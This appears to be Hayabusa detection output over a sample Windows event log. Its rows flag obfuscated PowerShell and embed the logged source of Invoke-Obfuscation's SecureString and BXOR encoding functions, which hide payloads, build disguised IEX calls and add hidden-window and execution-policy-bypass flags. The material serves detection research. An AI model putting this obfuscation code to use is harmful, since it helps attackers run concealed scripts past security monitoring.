I have a POC that does this and will be releasing a STAGING set of functions soon to accomplish this very task. This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding(DefaultParameterSetName = 'FilePath')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 0, ParameterSetName = 'FilePath')] [ValidateNotNullOrEmpty()] [String] $Path, [Switch] $NoExit, [Switch] $NoProfile, [Switch] $NonInteractive, [Switch] $NoLogo, [Switch] $Wow64, [Switch] $Command, [ValidateSet('Normal', 'Minimized', 'Maximized', 'Hidden')] [String] $WindowStyle, [ValidateSet('Bypass', 'Unrestricted', 'RemoteSigned', 'AllSigned', 'Restricted')] [String] $ExecutionPolicy, [Switch] $PassThru ) # Either convert ScriptBlock to a String or convert script at $Path to a String. If($PSBoundParameters['Path']) { Get-ChildItem $Path -ErrorAction Stop | Out-Null $ScriptString = [IO.File]::ReadAllText((Resolve-Path $Path)) } Else { $ScriptString = [String]$ScriptBlock } # Convert $ScriptString to a SecureString object. $SecureString = ConvertTo-SecureString $ScriptString -AsPlainText -Force # Randomly select the key length. Supported key lengths for SecureString (AES) are 16, 24 and 32. $KeyLength = Get-Random @(16,24,32) # Randomly select the key value and how it will be formatted. Switch(Get-Random -Minimum 1 -Maximum 3) { 1 { # Generate random key of length $KeyLength. $SecureStringKey = @() For($i=0; $i -lt $KeyLength; $i++) { $SecureStringKey += Get-Random -Minimum 0 -Maximum 256 } $SecureStringKeyStr = $SecureStringKey -Join ',' } 2 { # Generate sequential key of length $KeyLength with random array bounds. # To save space use shorthand array notation in final command with $SecureStringKeyStr. 
$LowerBound = (Get-Random -Minimum 0 -Maximum (256-$KeyLength)) $UpperBound = $LowerBound + ($KeyLength - 1) Switch(Get-Random @('Ascending','Descending')) { 'Ascending' {$SecureStringKey = ($LowerBound..$UpperBound); $SecureStringKeyStr = ""($LowerBound..$UpperBound)""} 'Descending' {$SecureStringKey = ($UpperBound..$LowerBound); $SecureStringKeyStr = ""($UpperBound..$LowerBound)""} default {Write-Error ""An invalid array ordering option was generated for switch block.""; Exit;} } } default {Write-Error ""An invalid random number was generated for switch block.""; Exit;} } # Convert SecureString object to text that we can load on target system. $SecureStringText = $SecureString | ConvertFrom-SecureString -Key $SecureStringKey # Generate random syntax for -Key command argument. $Key = (Get-Random -Input @(' -Key ',' -Ke ',' -K ')) # Randomly choose member invocation syntax. "".Invoke"" syntax below is not necessary for PS 3.0+ $PtrToStringAuto = (Get-Random -Input @('PtrToStringAuto',('([Runtime.InteropServices.Marshal].GetMembers()[' + (Get-Random -Input @(3,5)) + '].Name).Invoke'))) $PtrToStringUni = (Get-Random -Input @('PtrToStringUni' ,('([Runtime.InteropServices.Marshal].GetMembers()[' + (Get-Random -Input @(2,4)) + '].Name).Invoke'))) $PtrToStringAnsi = (Get-Random -Input @('PtrToStringAnsi',('([Runtime.InteropServices.Marshal].GetMembers()[' + (Get-Random -Input @(0,1)) + '].Name).Invoke'))) # Below four notations are commented out as they only work on PS 3.0+ #$PtrToStringBSTR = (Get-Random -Input @('PtrToStringBSTR' ,'([Runtime.InteropServices.Marshal].GetMembers()[142].Name).Invoke')) #$SecureStringToBSTR = (Get-Random -Input @('SecureStringToBSTR' ,'([Runtime.InteropServices.Marshal].GetMembers()[162].Name)')) #$SecureStringToGlobalAllocUnicode = (Get-Random -Input @('SecureStringToGlobalAllocUnicode','([Runtime.InteropServices.Marshal].GetMembers()[169].Name)')) #$SecureStringToGlobalAllocAnsi = (Get-Random -Input @('SecureStringToGlobalAllocAnsi' 
,'([Runtime.InteropServices.Marshal].GetMembers()[168].Name)')) # Randomize the case versions for necessary operations. $PtrToStringAuto = ([Char[]]""[Runtime.InteropServices.Marshal]::$PtrToStringAuto("" | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $PtrToStringUni = ([Char[]]""[Runtime.InteropServices.Marshal]::$PtrToStringUni("" | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $PtrToStringAnsi = ([Char[]]""[Runtime.InteropServices.Marshal]::$PtrToStringAnsi("" | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $PtrToStringBSTR = ([Char[]]'[Runtime.InteropServices.Marshal]::PtrToStringBSTR(' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SecureStringToBSTR = ([Char[]]'[Runtime.InteropServices.Marshal]::SecureStringToBSTR(' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SecureStringToGlobalAllocUnicode = ([Char[]]'[Runtime.InteropServices.Marshal]::SecureStringToGlobalAllocUnicode(' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SecureStringToGlobalAllocAnsi = ([Char[]]'[Runtime.InteropServices.Marshal]::SecureStringToGlobalAllocAnsi(' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $NewObject = ([Char[]]'New-Object ' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $PSCredential = ([Char[]]'Management.Automation.PSCredential ' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' 
$ConvertToSecureString = ([Char[]]'ConvertTo-SecureString' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Key = ([Char[]]$Key | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $GetNetworkCredential = ([Char[]]').GetNetworkCredential().Password' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Set syntax for running ConvertTo-SecureString cmdlet. $ConvertToSecureStringSyntax = '$(' + ""'$SecureStringText'"" + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ConvertToSecureString + ' '*(Get-Random -Input @(0,1)) + $Key + ' '*(Get-Random -Input @(0,1)) + $SecureStringKeyStr + ')' + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ')' # Generate the code that will decrypt and execute the payload and randomly select one. 
$NewScriptArray = @() $NewScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + $PtrToStringAuto + ' '*(Get-Random -Input @(0,1)) + $SecureStringToBSTR + ' '*(Get-Random -Input @(0,1)) + $ConvertToSecureStringSyntax $NewScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + $PtrToStringUni + ' '*(Get-Random -Input @(0,1)) + $SecureStringToGlobalAllocUnicode + ' '*(Get-Random -Input @(0,1)) + $ConvertToSecureStringSyntax $NewScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + $PtrToStringAnsi + ' '*(Get-Random -Input @(0,1)) + $SecureStringToGlobalAllocAnsi + ' '*(Get-Random -Input @(0,1)) + $ConvertToSecureStringSyntax $NewScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + $PtrToStringBSTR + ' '*(Get-Random -Input @(0,1)) + $SecureStringToBSTR + ' '*(Get-Random -Input @(0,1)) + $ConvertToSecureStringSyntax $NewScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + $NewObject + ' '*(Get-Random -Input @(0,1)) + $PSCredential + ' '*(Get-Random -Input @(0,1)) + ""' '"" + ',' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + ""'$SecureStringText'"" + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ConvertToSecureString + ' '*(Get-Random -Input @(0,1)) + $Key + ' '*(Get-Random -Input @(0,1)) + $SecureStringKeyStr + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + $GetNetworkCredential # Select random option from above. $NewScript = (Get-Random -Input $NewScriptArray) # Generate random invoke operation syntax. # Below code block is a copy from Out-ObfuscatedStringCommand.ps1. It is copied into this encoding function so that this will remain a standalone script without dependencies. $InvokeExpressionSyntax = @() $InvokeExpressionSyntax += (Get-Random -Input @('IEX','Invoke-Expression')) # Added below slightly-randomized obfuscated ways to form the string 'iex' and then invoke it with . or &. 
# Though far from fully built out (and not sure that I ever will), these are included to highlight how IEX/Invoke-Expression is a great indicator but not a silver bullet. # These methods draw on common environment variable values and PowerShell Automatic Variable values/methods/members/properties/etc. $InvocationOperator = (Get-Random -Input @('.','&')) + ' '*(Get-Random -Input @(0,1)) $InvokeExpressionSyntax += $InvocationOperator + ""( `$ShellId[1]+`$ShellId[13]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$PSHome["" + (Get-Random -Input @(4,21)) + ""]+`$PSHome["" + (Get-Random -Input @(30,34)) + ""]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:Public[13]+`$env:Public[5]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:ComSpec[4,"" + (Get-Random -Input @(15,24,26)) + "",25]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""(("" + (Get-Random -Input @('Get-Variable','GV','Variable')) + "" '*mdr*').Name[3,11,2]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @('$VerbosePreference.ToString()','([String]$VerbosePreference)')) + ""[1,3]+'x'-Join'')"" # Randomly choose from above invoke operation syntaxes. $InvokeExpression = (Get-Random -Input $InvokeExpressionSyntax) # Randomize the case of selected invoke operation. 
$InvokeExpression = ([Char[]]$InvokeExpression | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Generate random Invoke-Expression/IEX syntax and ordering: IEX ($ScriptString) or ($ScriptString | IEX) $InvokeOptions = @() $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $InvokeExpression + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $InvokeExpression # Select random option from above. $NewScript = (Get-Random -Input $InvokeOptions) # If user did not include -PassThru flag then continue with adding execution flgs and powershell.exe to $NewScript. If(!$PSBoundParameters['PassThru']) { # Array to store all selected PowerShell execution flags. $PowerShellFlags = @() # Build the PowerShell execution flags by randomly selecting execution flags substrings and randomizing the order. # This is to prevent Blue Team from placing false hope in simple signatures for common substrings of these execution flags. 
$CommandlineOptions = New-Object String[](0) If($PSBou",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.271 +09:00,SEC511,4104,high,Exec,Accessing WinAPI in PowerShell,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_accessing_win_api.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.271 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"ndParameters['NoExit']) { $FullArgument = ""-NoExit""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoProfile']) { $FullArgument = ""-NoProfile""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NonInteractive']) { $FullArgument = ""-NonInteractive""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 5 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoLogo']) { $FullArgument = ""-NoLogo""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['WindowStyle'] -OR $WindowsStyle) { $FullArgument = ""-WindowStyle"" If($WindowsStyle) {$ArgumentValue = $WindowsStyle} Else {$ArgumentValue = $PSBoundParameters['WindowStyle']} # Randomly decide to write WindowStyle value with flag substring or integer value. 
Switch($ArgumentValue.ToLower()) { 'normal' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('0','n','no','nor','norm','norma'))}} 'hidden' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('1','h','hi','hid','hidd','hidde'))}} 'minimized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('2','mi','min','mini','minim','minimi','minimiz','minimize'))}} 'maximized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('3','ma','max','maxi','maxim','maximi','maximiz','maximize'))}} default {Write-Error ""An invalid `$ArgumentValue value ($ArgumentValue) was passed to switch block for Out-PowerShellLauncher.""; Exit;} } $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } If($PSBoundParameters['ExecutionPolicy'] -OR $ExecutionPolicy) { $FullArgument = ""-ExecutionPolicy"" If($ExecutionPolicy) {$ArgumentValue = $ExecutionPolicy} Else {$ArgumentValue = $PSBoundParameters['ExecutionPolicy']} # Take into account the shorted flag of -EP as well. $ExecutionPolicyFlags = @() $ExecutionPolicyFlags += '-EP' For($Index=3; $Index -le $FullArgument.Length; $Index++) { $ExecutionPolicyFlags += $FullArgument.SubString(0,$Index) } $ExecutionPolicyFlag = Get-Random -Input $ExecutionPolicyFlags $PowerShellFlags += $ExecutionPolicyFlag + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } # Randomize the order of the execution flags. # This is to prevent the Blue Team from placing false hope in simple signatures for ordering of these flags. If($CommandlineOptions.Count -gt 1) { $CommandlineOptions = Get-Random -InputObject $CommandlineOptions -Count $CommandlineOptions.Count } # If selected then the -Command flag needs to be added last. 
If($PSBoundParameters['Command']) { $FullArgument = ""-Command"" $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) } # Randomize the case of all command-line arguments. For($i=0; $i -lt $PowerShellFlags.Count; $i++) { $PowerShellFlags[$i] = ([Char[]]$PowerShellFlags[$i] | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } # Random-sized whitespace between all execution flags and encapsulating final string of execution flags. $CommandlineOptions = ($CommandlineOptions | ForEach-Object {$_ + "" ""*(Get-Random -Minimum 1 -Maximum 3)}) -Join '' $CommandlineOptions = "" ""*(Get-Random -Minimum 0 -Maximum 3) + $CommandlineOptions + "" ""*(Get-Random -Minimum 0 -Maximum 3) # Build up the full command-line string. If($PSBoundParameters['Wow64']) { $CommandLineOutput = ""$($Env:windir)\SysWOW64\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" } Else { # Obfuscation isn't about saving space, and there are reasons you'd potentially want to fully path powershell.exe (more info on this soon). #$CommandLineOutput = ""$($Env:windir)\System32\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" $CommandLineOutput = ""powershell $($CommandlineOptions) `""$NewScript`"""" } # Make sure final command doesn't exceed cmd.exe's character limit. $CmdMaxLength = 8190 If($CommandLineOutput.Length -gt $CmdMaxLength) { Write-Warning ""This command exceeds the cmd.exe maximum allowed length of $CmdMaxLength characters! 
Its length is $($CmdLineOutput.Length) characters."" } $NewScript = $CommandLineOutput } Return $NewScript }",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.271 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.271 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"ndParameters['NoExit']) { $FullArgument = ""-NoExit""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoProfile']) { $FullArgument = ""-NoProfile""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NonInteractive']) { $FullArgument = ""-NonInteractive""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 5 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoLogo']) { $FullArgument = ""-NoLogo""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['WindowStyle'] -OR $WindowsStyle) { $FullArgument = ""-WindowStyle"" If($WindowsStyle) {$ArgumentValue = $WindowsStyle} Else {$ArgumentValue = $PSBoundParameters['WindowStyle']} # Randomly decide to write WindowStyle value with flag substring or integer value. 
Switch($ArgumentValue.ToLower()) { 'normal' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('0','n','no','nor','norm','norma'))}} 'hidden' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('1','h','hi','hid','hidd','hidde'))}} 'minimized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('2','mi','min','mini','minim','minimi','minimiz','minimize'))}} 'maximized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('3','ma','max','maxi','maxim','maximi','maximiz','maximize'))}} default {Write-Error ""An invalid `$ArgumentValue value ($ArgumentValue) was passed to switch block for Out-PowerShellLauncher.""; Exit;} } $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } If($PSBoundParameters['ExecutionPolicy'] -OR $ExecutionPolicy) { $FullArgument = ""-ExecutionPolicy"" If($ExecutionPolicy) {$ArgumentValue = $ExecutionPolicy} Else {$ArgumentValue = $PSBoundParameters['ExecutionPolicy']} # Take into account the shorted flag of -EP as well. $ExecutionPolicyFlags = @() $ExecutionPolicyFlags += '-EP' For($Index=3; $Index -le $FullArgument.Length; $Index++) { $ExecutionPolicyFlags += $FullArgument.SubString(0,$Index) } $ExecutionPolicyFlag = Get-Random -Input $ExecutionPolicyFlags $PowerShellFlags += $ExecutionPolicyFlag + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } # Randomize the order of the execution flags. # This is to prevent the Blue Team from placing false hope in simple signatures for ordering of these flags. If($CommandlineOptions.Count -gt 1) { $CommandlineOptions = Get-Random -InputObject $CommandlineOptions -Count $CommandlineOptions.Count } # If selected then the -Command flag needs to be added last. 
If($PSBoundParameters['Command']) { $FullArgument = ""-Command"" $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) } # Randomize the case of all command-line arguments. For($i=0; $i -lt $PowerShellFlags.Count; $i++) { $PowerShellFlags[$i] = ([Char[]]$PowerShellFlags[$i] | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } # Random-sized whitespace between all execution flags and encapsulating final string of execution flags. $CommandlineOptions = ($CommandlineOptions | ForEach-Object {$_ + "" ""*(Get-Random -Minimum 1 -Maximum 3)}) -Join '' $CommandlineOptions = "" ""*(Get-Random -Minimum 0 -Maximum 3) + $CommandlineOptions + "" ""*(Get-Random -Minimum 0 -Maximum 3) # Build up the full command-line string. If($PSBoundParameters['Wow64']) { $CommandLineOutput = ""$($Env:windir)\SysWOW64\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" } Else { # Obfuscation isn't about saving space, and there are reasons you'd potentially want to fully path powershell.exe (more info on this soon). #$CommandLineOutput = ""$($Env:windir)\System32\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" $CommandLineOutput = ""powershell $($CommandlineOptions) `""$NewScript`"""" } # Make sure final command doesn't exceed cmd.exe's character limit. $CmdMaxLength = 8190 If($CommandLineOutput.Length -gt $CmdMaxLength) { Write-Warning ""This command exceeds the cmd.exe maximum allowed length of $CmdMaxLength characters! 
Its length is $($CmdLineOutput.Length) characters."" } $NewScript = $CommandLineOutput } Return $NewScript }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.276 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"# This file is part of Invoke-Obfuscation. # # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Out-EncodedBXORCommand { <# .SYNOPSIS Generates BXOR (bitwise XOR) encoded payload for a PowerShell command or script. Optionally it adds command line output to final command. Invoke-Obfuscation Function: Out-EncodedBXORCommand Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-EncodedBXORCommand encodes an input PowerShell scriptblock or path as an bitwise XOR'd payload. It randomly chooses between .Split/-Split/array syntax to store the encoded payload in the final output. The purpose is to highlight to the Blue Team that there are more novel ways to encode a PowerShell command other than the most common Base64 approach. .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER Path Specifies the path to your payload. .PARAMETER NoExit Outputs the option to not exit after running startup commands. 
.PARAMETER NoProfile Outputs the option to not load the Windows PowerShell profile. .PARAMETER NonInteractive Outputs the option to not present an interactive prompt to the user. .PARAMETER NoLogo Outputs the option to not present the logo to the user. .PARAMETER Wow64 Calls the x86 (Wow64) version of PowerShell on x86_64 Windows installations. .PARAMETER Command Outputs the option to execute the specified commands (and any parameters) as though they were typed at the Windows PowerShell command prompt. .PARAMETER WindowStyle Outputs the option to set the window style to Normal, Minimized, Maximized or Hidden. .PARAMETER ExecutionPolicy Outputs the option to set the default execution policy for the current session. .PARAMETER PassThru (Optional) Avoids applying final command line syntax if you want to apply more obfuscation functions (or a different launcher function) to the final output. .EXAMPLE C:\PS> Out-EncodedBXORCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive powershell -NoProfil -NonInter ""((97,68 ,95 ,66,83 , 27 , 126, 89 , 69 , 66 ,22 ,17 , 126,83,90 , 90 ,89,22 , 97,89, 68 ,90 ,82 , 23 , 17 ,22 , 27 , 112, 89 ,68, 83 , 81,68 , 89,67 ,88 , 82 ,117, 89 , 90,89, 68 , 22 ,113,68 , 83,8 3 ,88,13 , 22,97,68 , 95,66 , 83,27 ,126,89 , 69 , 66 , 22 , 17 , 121,84, 80, 67 ,69,85,87, 66,95, 89, 88 , 22, 100 ,89, 85, 93 , 69, 23, 17 ,22,27 , 112,89 ,68 ,83 ,81 , 68 , 89, 67, 88 ,82,117, 89,90 , 89, 68,22 ,113,68, 83 , 83,88 ) | fOREACh-objEct{[ChAR]($_ -bxoR'0x36' )} )-jOIn'' | InVOKE-ExpressIon"" C:\PS> Out-EncodedBXORCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' 
-ForegroundColor Green} -NoProfile -NonInteractive -PassThru ( ( 180,145 , 138 ,151, 134, 206 ,171 , 140, 144 ,151 , 195 ,196 , 171 ,134, 143 ,143,140 , 195 ,180, 140 , 145 ,143,135 , 194,196 , 195, 206, 165,140 ,145,134,132,145,140 , 150 ,141, 135 , 160, 140 ,143 , 140 ,145 , 195,164,145 , 134 , 134 , 141 ,216 ,195 ,180 ,145 ,138, 151 ,134 ,206, 171,140 , 144 ,151,195 ,196,172,129 ,133 ,150,144 , 128 ,130 ,151 ,138,140 ,141 , 195 , 177,140,128,136 , 144 , 194, 196 ,195,206,165 , 140 , 145,134,132, 145 ,140 ,150 ,141,135 , 16 0 , 140, 143, 140 , 145 ,195 ,164 ,145,134 , 134, 141) | fOrEAch-ObJect {[chaR] ( $_-BXor 0xE3 ) } )-jOIN'' | iEx .NOTES This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding(DefaultParameterSetName = 'FilePath')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 0, ParameterSetName = 'FilePath')] [ValidateNotNullOrEmpty()] [String] $Path, [Switch] $NoExit, [Switch] $NoProfile, [Switch] $NonInteractive, [Switch] $NoLogo, [Switch] $Wow64, [Switch] $Command, [ValidateSet('Normal', 'Minimized', 'Maximized', 'Hidden')] [String] $WindowStyle, [ValidateSet('Bypass', 'Unrestricted', 'RemoteSigned', 'AllSigned', 'Restricted')] [String] $ExecutionPolicy, [Switch] $PassThru ) # Either convert ScriptBlock to a String or convert script at $Path to a String. If($PSBoundParameters['Path']) { Get-ChildItem $Path -ErrorAction Stop | Out-Null $ScriptString = [IO.File]::ReadAllText((Resolve-Path $Path)) } Else { $ScriptString = [String]$ScriptBlock } # Create list of random delimiters $RandomDelimiters. # Avoid using . * ' "" [ ] ( ) etc. as delimiters as these will cause problems in the -Split command syntax. $RandomDelimiters = @('_','-',',','{','}','~','!','@','%','&','<','>') # Add letters a-z with random case to $RandomDelimiters. 
@('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') | ForEach-Object {$UpperLowerChar = $_; If(((Get-Random -Input @(1..2))-1 -eq 0)) {$UpperLowerChar = $UpperLowerChar.ToUpper()} $RandomDelimiters += $UpperLowerChar} # Only use a subset of current delimiters to randomize what you see in every iteration of this script's output. $RandomDelimiters = (Get-Random -Input $RandomDelimiters -Count ($RandomDelimiters.Count/4)) # Generate random hex value for BXOR. Keep from 0x00 to 0x5F to avoid character representations on the command line that are unsupported by PowerShell. $HexDigitRange = @(0,1,2,3,4,5,6,7,8,9,'a','A','b','B','c','C','d','D','e','E','f','F') $BXORValue = '0x' + (Get-Random -Input @(0..5)) + (Get-Random -Input $HexDigitRange) # Convert $ScriptString to delimited and BXOR'd ASCII values in [Char] array separated by random delimiter from defined list $RandomDelimiters. $DelimitedEncodedArray = '' ([Char[]]$ScriptString) | ForEach-Object {$DelimitedEncodedArray += ([String]([Int][Char]$_ -BXOR $BXORValue) + (Get-Random -Input $RandomDelimiters))} # Remove trailing delimiter from $DelimitedEncodedArray. $DelimitedEncodedArray = $DelimitedEncodedArray.SubString(0,$DelimitedEncodedArray.Length-1) # Create printable version of $RandomDelimiters in random order to be used by final command. $RandomDelimitersToPrint = (Get-Random -Input $RandomDelimiters -Count $RandomDelimiters.Length) -Join '' # Generate random case versions for necessary operations. 
$ForEachObject = Get-Random -Input @('ForEach','ForEach-Object','%') $StrJoin = ([Char[]]'[String]::Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $StrStr = ([Char[]]'[String]' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Join = ([Char[]]'-Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $BXOR = ([Char[]]'-BXOR' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $CharStr = ([Char[]]'Char' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Int = ([Char[]]'Int' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $ForEachObject = ([Char[]]$ForEachObject | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Create printable version of $RandomDelimiters in random order to be used by final command specifically for -Split syntax. 